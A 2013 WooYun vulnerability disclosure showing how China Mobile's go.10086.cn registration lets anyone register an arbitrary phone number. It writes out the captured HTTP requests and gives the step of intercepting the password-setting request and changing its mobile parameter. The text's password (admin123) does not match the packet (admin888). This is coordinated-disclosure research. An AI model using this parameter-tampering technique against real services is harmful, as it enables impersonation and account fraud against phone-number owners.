当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-026652

漏洞标题:中国移动手机冲浪任意用户注册

相关厂商:中国移动

漏洞作者: revoniag

提交时间:2013-06-24 10:08

修复时间:2013-08-08 10:09

公开时间:2013-08-08 10:09

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-24: 细节已通知厂商并且等待厂商处理中
2013-06-28: 厂商已经确认,细节仅向厂商公开
2013-07-08: 细节向核心白帽子及相关领域专家公开
2013-07-18: 细节向普通白帽子公开
2013-07-28: 细节向实习白帽子公开
2013-08-08: 细节向公众公开

简要描述:

如题所述,可为任意手机号码注册。

详细说明:

首先点击注册:
填写您自己的手机号,假设为13555555555,然后点发送验证码,会收到一条验证码,填写后点击下一步。发送的数据包如下:

POST /cc/register/mobile/smssend HTTP/1.1
Host: go.10086.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://go.10086.cn/cc//register/mobile/smssend
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
mobile=13555555555&code=134567&from=http%3A%2F%2Fgo.10086.cn


wooyun2.png


以上数据包我们不用管他,这时候跳转到一个设定密码的页面,我们将密码设定为admin123
采用本地代理工具如burpsuite拦截,此时点击下一步。我们发送的请求包如下:

POST /cc//register/mobile/set HTTP/1.1
Host: go.10086.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://go.10086.cn/cc//register/mobile/smssend
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
password=admin888&confirm=admin888&from=http%3A%2F%2Fgo.10086.cn&mobile=13555555555


此时将mobile的的值修改为:13455555555。

漏洞证明:

wooyun3.png

修复方案:

版权声明:转载请注明来源 revoniag@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2013-06-28 22:13

厂商回复:

最新状态:

暂无